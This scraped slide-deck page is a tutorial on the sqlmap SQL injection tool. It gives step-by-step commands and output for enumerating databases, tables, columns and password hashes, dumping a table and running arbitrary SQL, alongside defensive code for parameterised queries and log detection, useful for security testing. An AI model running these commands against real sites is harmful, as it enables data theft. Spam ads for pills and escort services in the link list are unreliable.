SQLMAP
SQL INJECTION
AUTOMATION TESTING TOOL
Pinaki mohapatra
QA @Mindfire Solutions
Roadmap

SQL Injection

SQLMAP

Installation Procedure

Case study (a practical demonstration
using some predefined commands that
the SQLMAP tool supports)
SQL INJECTION

SQL injection is a code injection
technique, used to attack data driven
applications, in which malicious SQL
statements are inserted into an entry
field for execution (e.g. to dump the
database contents to the attacker).

An attacker or malicious user could provide
unexpected inputs to the application that
are then used to frame and execute SQL
statements on the database.
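To make the definition concrete, here is an added example (not part of the original slides) that runs the same lookup three ways against an in-memory SQLite database: string concatenation, quote escaping, and input validation with a bound parameter. The table, data and function names are constructed for illustration; the numeric `id` parameter mirrors the numeric `ID` parameter in the case study later in this deck.

```python
import re
import sqlite3


def make_db():
    """Constructed sample data standing in for an application's product table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, hidden INTEGER)"
    )
    conn.executemany(
        "INSERT INTO products VALUES (?, ?, ?)",
        [(216, "public item", 0), (217, "unreleased item", 1), (218, "internal item", 1)],
    )
    return conn


def lookup_concatenated(conn, raw_id):
    # Vulnerable: the request value becomes part of the SQL text, so the
    # database parses client input as SQL syntax.
    sql = "SELECT id, name FROM products WHERE hidden = 0 AND id = " + raw_id
    return conn.execute(sql).fetchall()


def lookup_quote_escaped(conn, raw_id):
    # Still vulnerable: doubling quotes only protects values that sit inside a
    # quoted string literal. A numeric parameter is not quoted, so the input
    # needs no quote character to change the statement.
    escaped = raw_id.replace("'", "''")
    sql = "SELECT id, name FROM products WHERE hidden = 0 AND id = " + escaped
    return conn.execute(sql).fetchall()


ID_RE = re.compile(r"[0-9]{1,9}")


def lookup_hardened(conn, raw_id):
    # Hardened: reject anything that is not a plain decimal integer, then pass
    # the value as a bound parameter so it is never parsed as SQL.
    if not ID_RE.fullmatch(raw_id):
        raise ValueError("id must be a decimal integer")
    sql = "SELECT id, name FROM products WHERE hidden = 0 AND id = ?"
    return conn.execute(sql, (int(raw_id),)).fetchall()


def compare(raw_id):
    """Run all three lookups on a fresh database and collect the outcomes."""
    conn = make_db()
    results = {
        "concatenated": lookup_concatenated(conn, raw_id),
        "quote_escaped": lookup_quote_escaped(conn, raw_id),
    }
    try:
        results["hardened"] = lookup_hardened(conn, raw_id)
    except ValueError as exc:
        results["hardened"] = f"rejected: {exc}"
    return results


if __name__ == "__main__":
    for value in ("216", "216 OR 1=1"):
        print(repr(value), "->", compare(value))
```

With the second input, the concatenated and quote-escaped lookups return the hidden rows as well, while the hardened lookup rejects the request before any SQL runs.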
Cause
The following things might result from SQL injection:

The user could log in to the application as another user, even
as an administrator.

The user could view private information belonging to other
users e.g. details of other users’ profiles, their transaction
details etc.

The user could change application configuration information
and the data of the other users.

The user could modify the structure of the database; even
delete tables in the application database.

The user could take control of the database server and
execute commands on it at will.
SQLMAP
Sqlmap is an open source command-line automatic
SQL injection tool developed in Python. Its goal is
to detect and take advantage of SQL injection
vulnerabilities in web applications. Once it detects
one or more SQL injections on the target host, the
user can choose among a variety of options to
perform an extensive back-end database
management system fingerprint and retrieve the DBMS
session user and other DB-related information such as
databases, tables, columns, user credentials and their
privileges. Put simply, it can expose the
entire data present in the DBMS.
SQLMAP
Installation Procedure

Pre-requisites to run sqlmap:
Python 2.7.x and 3.3.x (Recommended by users)
http://www.python.org/download/

Download SQLMAP:
http://sourceforge.net/projects/sqlmapwin/?source=navbar

Reference:
https://github.com/sqlmapproject/sqlmap/wiki/Usage
SQLMAP: Finding !!
Syntax Format:
sqlmap.py -u "<Target url>" (e.g. http://www.test.com/index.php?id=5)
or
sqlmap.py -u "http://www.test.com/index.php?id=5" --dbs
Default behavior:

Tests all GET and/or POST parameters, for all
sqlmap options or commands, for all databases.

Yes, it may take a long time to execute the
commands.
SQLMAP: Finding !!
Verbosity:
Option: -v: This option can be used to set the verbosity level of
output messages. There exist seven levels of verbosity. The default
level is 1 in which information, warning, error, critical messages
and Python tracebacks (if any occur) are displayed.
0: Show only Python tracebacks, error and critical messages.
1: Show also information and warning messages.
2: Show also debug messages.
3: Show also payloads injected.
4: Show also HTTP requests.
5: Show also HTTP responses' headers.
6: Show also HTTP responses' page content.
SQLMAP: Enumeration (I)

Objective
Get/Retrieve data from DBMS tables

What can you get :
--current-db : Extract the current application DB in use
--current-user : Expose current DBMS user in use
--users : Expose or list out all the users from DB
--passwords : Lists all DBMS users, password hashes (sqlmap
will automatically try to crack the hashes with a dictionary
attack)
SQLMAP: Enumeration (I)

What can you get :
--privileges : List user privileges
--dbs : Lists all the databases
--tables -D <Database name> : List all the tables from a
specific database
--columns -T <Table name> -D <Database name> : List all the
columns from a specific table under a database
--dump (-D,-T,-C can be used to select what data to dump):
Dump data from database/table/column.
CASE STUDY
Practical Demonstration
STEP 1
Syntax: sqlmap.py -u "<Target URL>"
Objective: This is a simple command which checks the input parameters to find if
they are vulnerable to sql injection or not. For this sqlmap sends different kinds
of sql injection payloads to the input parameter and checks the output. In the
process sqlmap is also able to identify the remote system os, database name and
version.
Example: sqlmap.py -u "http://www.test.com/index.php?id=10"
Result:
C:\Users\pinakim\Desktop\sqlmap\sqlmap>sqlmap.py -u"http://www.test.com/web/prod_detail.php?ID=216"
sqlmap/0.9-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 11:23:29
[11:23:29] [INFO] using 'C:\Users\pinakim\Desktop\sqlmap\sqlmap\output\www.test.com\session' as session file
[11:23:29] [INFO] resuming match ratio '0.9' from session file
[11:23:29] [INFO] resuming injection parameter 'ID' from session file
[11:23:29] [INFO] resuming injection type 'numeric' from session file
[11:23:29] [INFO] resuming 0 number of parenthesis from session file
[11:23:29] [INFO] resuming back-end DBMS 'mysql 5' from session file
[11:23:29] [INFO] resuming back-end DBMS operating system 'None' from session file
[11:23:29] [INFO] resuming back-end DBMS operating system 'None' from session file
[11:23:29] [INFO] testing connection to the target url
[11:23:32] [INFO] testing for parenthesis on injectable parameter
[11:23:32] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5
[*] shutting down at: 11:23:32
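Seen from the web server's side, the probing described in the Step 1 objective shows up in the access log. The following added example (not part of the original slides) flags clients whose requests carry the scanner's default User-Agent or repeated SQL test patterns in query parameters. The log lines are constructed; the User-Agent value is modelled on the banner printed above, and the pattern list and the threshold are assumptions to tune against real traffic.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Apache/Nginx "combined" log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# sqlmap identifies itself as "sqlmap/<version> ..." unless the tester overrides it.
SCANNER_UA = re.compile(r"^sqlmap/", re.I)

# Illustrative patterns, matched against URL-decoded parameter values.
SQL_PATTERNS = {
    "boolean-test": re.compile(r"\b(?:AND|OR)\s+\d+\s*=\s*\d+", re.I),
    "union-select": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
    "schema-enum": re.compile(r"\binformation_schema\b", re.I),
    "time-delay": re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.I),
}

# Constructed sample log (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2000:11:23:28 +0000] "GET /web/prod_detail.php?ID=216 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [01/Jan/2000:11:23:28 +0000] "GET /search.php?q=trade+union+select+committee HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jan/2000:11:23:29 +0000] "GET /web/prod_detail.php?ID=216%20AND%201%3D1 HTTP/1.1" 200 5120 "-" "sqlmap/0.9-dev (http://sqlmap.sourceforge.net)"',
    '198.51.100.7 - - [01/Jan/2000:11:23:30 +0000] "GET /web/prod_detail.php?ID=216%20AND%201%3D2 HTTP/1.1" 200 310 "-" "sqlmap/0.9-dev (http://sqlmap.sourceforge.net)"',
    '198.51.100.7 - - [01/Jan/2000:11:23:31 +0000] "GET /web/prod_detail.php?ID=216%20UNION%20ALL%20SELECT%20NULL%2CNULL HTTP/1.1" 200 310 "-" "sqlmap/0.9-dev (http://sqlmap.sourceforge.net)"',
    '203.0.113.5 - - [01/Jan/2000:11:30:02 +0000] "GET /web/prod_detail.php?ID=216%20AND%205%3D5 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [01/Jan/2000:11:30:03 +0000] "GET /web/prod_detail.php?ID=216%20AND%20(SELECT%20COUNT(*)%20FROM%20information_schema.tables)%3E0 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]


def classify(line):
    """Return (client_ip, set_of_reasons) for one log line, or None if unparsable."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    reasons = set()
    if SCANNER_UA.match(m["ua"]):
        reasons.add("scanner-user-agent")
    query = urlsplit(m["target"]).query
    # parse_qsl percent-decodes values, so encoded probes are matched too.
    for name, value in parse_qsl(query, keep_blank_values=True):
        for label, pattern in SQL_PATTERNS.items():
            if pattern.search(value):
                reasons.add(f"{label}:{name}")
    return m["ip"], reasons


def detect(lines, min_requests=2):
    """Alert on a scanner User-Agent, or on min_requests suspicious requests per client."""
    per_client = defaultdict(lambda: {"requests": 0, "reasons": set()})
    for line in lines:
        parsed = classify(line)
        if parsed is None:
            continue
        ip, reasons = parsed
        if reasons:
            per_client[ip]["requests"] += 1
            per_client[ip]["reasons"] |= reasons
    return {
        ip: sorted(entry["reasons"])
        for ip, entry in per_client.items()
        if "scanner-user-agent" in entry["reasons"] or entry["requests"] >= min_requests
    }


if __name__ == "__main__":
    for client, why in detect(SAMPLE_LOG).items():
        print(client, why)
```

The single search request from 192.0.2.44 matches one pattern but stays below the threshold, which is why the per-client count is used instead of alerting on any single match.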
STEP 2
Syntax: sqlmap.py -u "<Target URL>" --dbs
Objective: It lists the databases if the target URL is vulnerable to SQL injection.
Example: sqlmap.py -u "http://www.test.com/index.php?id=10" --dbs
Result:
[11:32:17] [INFO] fetching database names
[11:32:17] [INFO] fetching number of databases
[11:32:17] [INFO] read from file 'C:\Users\pinakim\Desktop\sqlmap\sqlmap\output\www.test.com\session': 2
[11:32:17] [INFO] read from file 'C:\Users\pinakim\Desktop\sqlmap\sqlmap\output\www.test.com\session': information_schema
[11:32:17] [INFO] read from file 'C:\Users\pinakim\Desktop\sqlmap\sqlmap\output\www.test.com\session': testingpa
available databases [2]:
[*] information_schema
[*] testingpa
STEP 3
Syntax: sqlmap.py -u "<Target URL>" --tables -D <Database name>
Objective: It finds the list of tables that exist in the specified database.
Example: sqlmap.py -u "http://www.test.com/index.php?id=10" --tables -D TestDB
Result:
web application technology: Apache, PHP 5.4.4
back-end DBMS: MySQL >= 5.0.0
[10:34:37] [INFO] fetching tables for database 'testingpa'
[10:34:37] [INFO] fetching number of tables for database 'testingpa'
[10:34:37] [INFO] retrieved: 36
[10:34:59] [INFO] retrieved: reg_cat
[10:37:33] [INFO] retrieved: reg_section
[10:44:46] [INFO] retrieved: admin_right
[10:47:35] [INFO] retrieved: admin_user
[10:50:20] [INFO] retrieved: new_cat
[10:53:03] [INFO] retrieved: new_image
[10:56:20] [INFO] retrieved: new_section
[11:00:11] [INFO] retrieved: ave_config
[11:02:50] [INFO] retrieved: ave_sections
[11:06:06] [INFO] retrieved: download_new_cat
[11:09:17] [INFO] retrieved: audio_cat
[11:11:37] [INFO] retrieved: audio_image
[11:14:22] [INFO] retrieved: audio_section
.
.
[12:33:11] [INFO] retrieved: vendor_section
Database: testingqa
[36 tables]
+-----------------------+
| reg_cat |
| reg_section |
| admin_group |
| admin_right |
| admin_user |
| new_cat |
| new_image |
| new_section |
| ave_config |
| ave_sections |
| download_new_cat |
| audio_cat |
| audio_image |
| audio_section |
| video_audio_cat |
| video_audio_section |
| linking_config |
| linking_section |
| test_cat |
| test_image |
| test_section |
| test_reg |
| test_videos |
| miscellanesous_test |
| miscellanesous_image |
| miscellanesous_section |
| newsfuse_config |
| newsfuse_section |
| newsfuse_section |
| promo_reg_cat |
| promo_image |
| promo_section |
| promo_test |
| promo_videos |
| test_reg_section |
| vendor_section |
+-----------------------+
[12:36:46] [INFO] Fetched data logged to text files under 'C:\Users\pinakim\Desktop\sqlmap\sqlmap\output\www.test.com'
[*] shutting down at: 12:36:46
STEP 4
Syntax: sqlmap.py -u "<Target URL>" --columns -D <Database name> -T <Table name>
Objective: It finds the list of columns that exist in the specified table under the
database.
Example: sqlmap.py -u "http://www.test.com/index.php?id=10" --columns -D TestDB -T Users
Result:
web application technology: Apache, PHP 5.4.4
back-end DBMS: MySQL 5
[10:46:43] [INFO] fetching columns for table 'req_section' on database 'testingpa'
[10:46:43] [INFO] fetching number of columns for table 'reg_section' on database 'testingpa'
[10:46:43] [INFO] retrieved: 5
[10:46:56] [INFO] retrieved: reg_id
[10:49:13] [INFO] retrieved: int(11)
[10:50:52] [INFO] retrieved: reg_url
[10:53:06] [INFO] retrieved: varchar(255)
[10:55:53] [INFO] retrieved: reg_redirect
[10:59:07] [INFO] retrieved: varchar(255)
[11:01:42] [INFO] retrieved: reg_active
[11:04:30] [INFO] retrieved: int(11)
[11:06:03] [INFO] retrieved: reg_cat_id
[11:07:27] [INFO] retrieved: int(11)
Database: testingpa
Table: reg_section
[5 columns]
+--------------+--------------+
| Column       | Type         |
+--------------+--------------+
| reg_active   | int(11)      |
| reg_id       | int(11)      |
| reg_redirect | varchar(255) |
| reg_url      | varchar(255) |
| reg_cat_id   | int(11)      |
+--------------+--------------+
[11:09:08] [INFO] Fetched data logged to text files under 'C:\Users\pinakim\Desktop\sqlmap\sqlmap\output\www.test.com'
[*] shutting down at: 11:09:08
STEP 5
Syntax: sqlmap.py -u "<Target URL>" --dump -D <Database Name> -T <Table Name>
Objective: Now we come to the most interesting part: extracting the data from
the table. The command below will retrieve, or simply dump, the data of the
particular table.
Example: sqlmap.py -u "http://www.test.com/index.php?id=10" --dump -D TestDB -T users
Result:
[13:15:46] [INFO] fetching entries for table 'ave_config' on database 'testingpa'
[13:15:46] [INFO] fetching number of entries for table 'ave_config' on database 'testingpa'
[13:15:46] [INFO] retrieved: 1
[13:15:59] [INFO] retrieved: 1
[13:16:34] [INFO] retrieved:
[13:16:49] [INFO] retrieved: info@test.com
[13:22:18] [INFO] retrieved: mike@test.com
[13:27:47] [INFO] retrieved: Testing property
[13:32:49] [INFO] retrieved: CMS
Database: testingpa
Table: ave_config
[1 entry]
+-----------+---------------+-----------------+---------------+------------------+------------+
| config_id | site_email_cc | site_email_from | site_email_to | site_owner       | site_title |
+-----------+---------------+-----------------+---------------+------------------+------------+
| 1         | NULL          | info@test.com   | mike@test.com | Testing property | CMS        |
+-----------+---------------+-----------------+---------------+------------------+------------+
[13:33:51] [INFO] Table 'testingpa.ave_config' dumped to CSV file 'C:\Users\pinakim\Desktop\sqlmap\sqlmap\output\www.test.com\dump\testingpa\ave_config.csv'
[13:33:51] [INFO] Fetched data logged to text files under 'C:\Users\pinakim\Desktop\sqlmap\sqlmap\output\www.test.com'
[*] shutting down at: 13:33:51
Other Related Command
1. To find out more information about the remote system database use the option
"-b". It will try to find the exact banner of the database server.
Example: sqlmap.py -u "http://www.test.com/index.php?id=10" -b
Result:
[11:44:40] [INFO] fetching banner
[11:44:40] [INFO] the back-end DBMS operating system is None
banner: '5.1.67-0+test1'
[11:44:40] [INFO] Fetched data logged to text files under 'C:\Users\pinakim\Desktop\sqlmap\sqlmap\output\www.test.com'
2. The next command will fetch the list of users and passwords.
Example: sqlmap.py -u "http://www.test.com/index.php?id=10" --users --passwords --privileges
Result:
[11:53:23] [INFO] fetching database users
[11:53:23] [INFO] fetching number of database users
[11:53:23] [INFO] read from file 'C:\Users\pinakim\Desktop\sqlmap\sqlmap\output\www.test.com\session': 1
[11:53:23] [INFO] read from file 'C:\Users\pinakim\Desktop\sqlmap\sqlmap\output\www.test.com\session': 'testingpa'@'%'
database management system users [1]:
[*] 'testingpa'@'%'
[11:53:23] [INFO] fetching database users password hashes
[11:53:23] [INFO] fetching number of password hashes for user 'testingpa'
[11:53:23] [INFO] read from file 'C:\Users\pinakim\Desktop\sqlmap\sqlmap\output\www.test.com\session':
[11:53:23] [INFO] read from file 'C:\Users\pinakim\Desktop\sqlmap\sqlmap\output\www.test.com\session':
[11:53:23] [INFO] retrieved:
[11:53:27] [WARNING] unable to retrieve the number of password hashes for user 'testingpa'
[11:53:27] [ERROR] unable to retrieve the password hashes for the database users
Other Related Command
3. For getting the current user & current database information
Example: sqlmap.py -u "http://www.test.com/index.php?id=10" --current-user --is-dba --current-db --threads=10
Result:
[11:57:30] [INFO] fetching current user
[11:57:30] [INFO] retrieving the length of query output
[11:57:30] [INFO] retrieved: 10
[11:59:52] [INFO] retrieved: testingpa@%
current user: 'testingpa@%'
[11:59:52] [INFO] fetching current database
[11:59:52] [INFO] retrieving the length of query output
[11:59:52] [INFO] retrieved: 8
[12:00:58] [INFO] retrieved: testingpa
current database: 'testingpa'
[12:00:58] [INFO] testing if current user is DBA
[12:00:58] [INFO] retrieving the length of query output
[12:00:58] [INFO] retrieved:
[12:01:06] [INFO] retrieved:
current user is DBA: 'False'
[12:01:08] [INFO] Fetched data logged to text files under 'C:\Users\pinakim\Desktop\sqlmap\sqlmap\output\www.test.com'
4. Run an arbitrary SQL command
Example: sqlmap.py -u "http://www.test.com/index.php?id=10" --sql-query="SELECT * FROM <table name>"
Thank you !!!
www.mindfiresolutions.com

The Top App Development Trends Shaping the Industry in 2024-25 .pdf
 
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
 
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
 
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICECHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
 
LEVEL 5 - SESSION 1 2023 (1).pptx - PDF 123456
LEVEL 5   - SESSION 1 2023 (1).pptx - PDF 123456LEVEL 5   - SESSION 1 2023 (1).pptx - PDF 123456
LEVEL 5 - SESSION 1 2023 (1).pptx - PDF 123456
 
Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...
Chinsurah Escorts ☎️8617697112  Starting From 5K to 15K High Profile Escorts ...Chinsurah Escorts ☎️8617697112  Starting From 5K to 15K High Profile Escorts ...
Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...
 
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
 
ManageIQ - Sprint 236 Review - Slide Deck
ManageIQ - Sprint 236 Review - Slide DeckManageIQ - Sprint 236 Review - Slide Deck
ManageIQ - Sprint 236 Review - Slide Deck
 
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
 
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
 
introduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdf
introduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdfintroduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdf
introduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdf
 
HR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comHR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.com
 
8257 interfacing 2 in microprocessor for btech students
8257 interfacing 2 in microprocessor for btech students8257 interfacing 2 in microprocessor for btech students
8257 interfacing 2 in microprocessor for btech students
 
%in Midrand+277-882-255-28 abortion pills for sale in midrand
%in Midrand+277-882-255-28 abortion pills for sale in midrand%in Midrand+277-882-255-28 abortion pills for sale in midrand
%in Midrand+277-882-255-28 abortion pills for sale in midrand
 
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain
 
How To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected WorkerHow To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected Worker
 
BUS PASS MANGEMENT SYSTEM USING PHP.pptx
BUS PASS MANGEMENT SYSTEM USING PHP.pptxBUS PASS MANGEMENT SYSTEM USING PHP.pptx
BUS PASS MANGEMENT SYSTEM USING PHP.pptx
 

SQLMAP Tool Usage - A Heads Up

  • 1. SQLMAP
       SQL INJECTION AUTOMATION TESTING TOOL
       Pinaki mohapatra, QA @Mindfire Solutions
  • 2. Roadmap
       - SQL Injection
       - SQLMAP
       - Installation Procedure
       - Case study (a practical demonstration using some predefined commands that the SQLMAP tool supports)
  • 3. SQL INJECTION
       - SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker).
       - An attacker or malicious user could provide unexpected inputs to the application that are then used to frame and execute SQL statements on the database.
  • 4. Cause
       The following things might result from SQL injection:
       - The user could log in to the application as another user, even as an administrator.
       - The user could view private information belonging to other users, e.g. details of other users' profiles, their transaction details etc.
       - The user could change application configuration information and the data of other users.
       - The user could modify the structure of the database, even delete tables in the application database.
       - The user could take control of the database server and execute commands on it at will.
  • 5. SQLMAP
       Sqlmap is an open source command-line automatic SQL injection tool developed in Python. Its goal is to detect and take advantage of SQL injection vulnerabilities in web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint and retrieve the DBMS session user and other database-related information such as databases, tables, columns, user credentials and their privileges. Put simply, it can expose all of the data held in the DBMS.
  • 6. SQLMAP Installation Procedure
       - Pre-requisites to run sqlmap: Python 2.7.x and 3.3.x (Recommended by users)
         http://www.python.org/download/
       - Download SQLMAP:
         http://sourceforge.net/projects/sqlmapwin/?source=navbar
       - Reference:
         https://github.com/sqlmapproject/sqlmap/wiki/Usage
  • 7. SQLMAP: Finding !!
       Syntax format:
           sqlmap.py -u "<Target url>"    (e.g. http://www.test.com/index.php?id=5)
       or
           sqlmap.py -u "http://www.test.com/index.php?id=5" --dbs
       Default behavior:
       - Tests all GET and/or POST parameters, for all sqlmap options or commands, for all databases.
       - Yes, the commands may take a long time to execute.
  • 8. SQLMAP: Finding !!
       Verbosity
       Option: -v
       This option sets the verbosity level of output messages. There exist seven levels of verbosity. The default level is 1, in which information, warning, error and critical messages and Python tracebacks (if any occur) are displayed.
           0: Show only Python tracebacks, error and critical messages.
           1: Show also information and warning messages.
           2: Show also debug messages.
           3: Show also payloads injected.
           4: Show also HTTP requests.
           5: Show also HTTP responses' headers.
           6: Show also HTTP responses' page content.
  • 9. SQLMAP: Enumeration (I)
       - Objective: get/retrieve data from DBMS tables
       - What can you get:
           --current-db   : Extract the current application DB in use
           --current-user : Expose the current DBMS user in use
           --users        : Expose or list all the users from the DB
           --passwords    : List all DBMS users' password hashes (sqlmap will automatically try to crack the hashes with a dictionary attack)
  • 10. SQLMAP: Enumeration (I)
       - What can you get:
           --privileges : List user privileges
           --dbs        : List all the databases
           --tables -D <Database name> : List all the tables from a specific database
           --columns -T <Table name> -D <Database name> : List all the columns from a specific table under a database
           --dump (-D, -T, -C can be used to select what data to dump) : Dump data from database/table/column
  • 12. STEP 1
       Syntax: sqlmap.py -u "<Target URL>"
       Objective: This simple command checks the input parameters to find out whether they are vulnerable to SQL injection. To do this, sqlmap sends different kinds of SQL injection payloads to the input parameter and checks the output. In the process sqlmap is also able to identify the remote system OS, database name and version.
       Example: sqlmap.py -u "http://www.test.com/index.php?id=10"
       Result:
           C:\Users\pinakim\Desktop\sqlmap\sqlmap>sqlmap.py -u"http://www.test.com/web/prod_detail.php?ID=216"
           sqlmap/0.9-dev - automatic SQL injection and database takeover tool
           http://sqlmap.sourceforge.net
           [*] starting at: 11:23:29
           [11:23:29] [INFO] using 'C:\Users\pinakim\Desktop\sqlmap\sqlmap\output\www.test.com\session' as session file
           [11:23:29] [INFO] resuming match ratio '0.9' from session file
  • 13.     [11:23:29] [INFO] resuming injection parameter 'ID' from session file
           [11:23:29] [INFO] resuming injection type 'numeric' from session file
           [11:23:29] [INFO] resuming 0 number of parenthesis from session file
           [11:23:29] [INFO] resuming back-end DBMS 'mysql 5' from session file
           [11:23:29] [INFO] resuming back-end DBMS operating system 'None' from session file
           [11:23:29] [INFO] resuming back-end DBMS operating system 'None' from session file
           [11:23:29] [INFO] testing connection to the target url
           [11:23:32] [INFO] testing for parenthesis on injectable parameter
           [11:23:32] [INFO] the back-end DBMS is MySQL
           web application technology: Apache
           back-end DBMS: MySQL 5
           [*] shutting down at: 11:23:32
  • 14. STEP 2
       Syntax: sqlmap.py -u "<Target URL>" --dbs
       Objective: Lists the databases if the target URL is vulnerable to SQL injection.
       Example: sqlmap.py -u "http://www.test.com/index.php?id=10" --dbs
       Result:
           [11:32:17] [INFO] fetching database names
           [11:32:17] [INFO] fetching number of databases
           [11:32:17] [INFO] read from file 'C:\Users\pinakim\Desktop\sqlmap\sqlmap\output\www.test.com\session': 2
           [11:32:17] [INFO] read from file 'C:\Users\pinakim\Desktop\sqlmap\sqlmap\output\www.test.com\session': information_schema
           [11:32:17] [INFO] read from file 'C:\Users\pinakim\Desktop\sqlmap\sqlmap\output\www.test.com\session': testingpa
           available databases [2]:
           [*] information_schema
           [*] testingpa
  • 15. STEP 3
       Syntax: sqlmap.py -u "<Target URL>" --tables -D <Database name>
       Objective: Finds the list of tables that exist in the specified database.
       Example: sqlmap.py -u "http://www.test.com/index.php?id=10" --tables -D TestDB
       Result:
           web application technology: Apache, PHP 5.4.4
           back-end DBMS: MySQL >= 5.0.0
           [10:34:37] [INFO] fetching tables for database 'testingpa'
           [10:34:37] [INFO] fetching number of tables for database 'testingpa'
           [10:34:37] [INFO] retrieved: 36
           [10:34:59] [INFO] retrieved: reg_cat
           [10:37:33] [INFO] retrieved: reg_section
  • 16.     [10:44:46] [INFO] retrieved: admin_right
           [10:47:35] [INFO] retrieved: admin_user
           [10:50:20] [INFO] retrieved: new_cat
           [10:53:03] [INFO] retrieved: new_image
           [10:56:20] [INFO] retrieved: new_section
           [11:00:11] [INFO] retrieved: ave_config
           [11:02:50] [INFO] retrieved: ave_sections
           [11:06:06] [INFO] retrieved: download_new_cat
           [11:09:17] [INFO] retrieved: audio_cat
           [11:11:37] [INFO] retrieved: audio_image
           [11:14:22] [INFO] retrieved: audio_section
           . .
           [12:33:11] [INFO] retrieved: vendor_section
           Database: testingqa
           [36 tables]
  • 17.     +------------------------+
           | reg_cat                |
           | reg_section            |
           | admin_group            |
           | admin_right            |
           | admin_user             |
           | new_cat                |
           | new_image              |
           | new_section            |
           | ave_config             |
           | ave_sections           |
           | download_new_cat       |
           | audio_cat              |
           | audio_image            |
           | audio_section          |
           | video_audio_cat        |
           | video_audio_section    |
           | linking_config         |
           | linking_section        |
           | test_cat               |
  • 18.     | test_image             |
           | test_section           |
           | test_reg               |
           | test_videos            |
           | miscellanesous_test    |
           | miscellanesous_image   |
           | miscellanesous_section |
           | newsfuse_config        |
           | newsfuse_section       |
           | newsfuse_section       |
           | promo_reg_cat          |
           | promo_image            |
           | promo_section          |
           | promo_test             |
           | promo_videos           |
           | test_reg_section       |
           | vendor_section         |
           +------------------------+
           [12:36:46] [INFO] Fetched data logged to text files under 'C:\Users\pinakim\Desktop\sqlmap\sqlmap\output\www.test.com'
           [*] shutting down at: 12:36:46
  • 19. STEP 4
       Syntax: sqlmap.py -u "<Target URL>" --columns -D <Database name> -T <Table name>
       Objective: Finds the list of columns that exist in the specified table of the database.
       Example: sqlmap.py -u "http://www.test.com/index.php?id=10" --columns -D TestDB -T Users
       Result:
           web application technology: Apache, PHP 5.4.4
           back-end DBMS: MySQL 5
           [10:46:43] [INFO] fetching columns for table 'req_section' on database 'testingpa'
           [10:46:43] [INFO] fetching number of columns for table 'reg_section' on database 'testingpa'
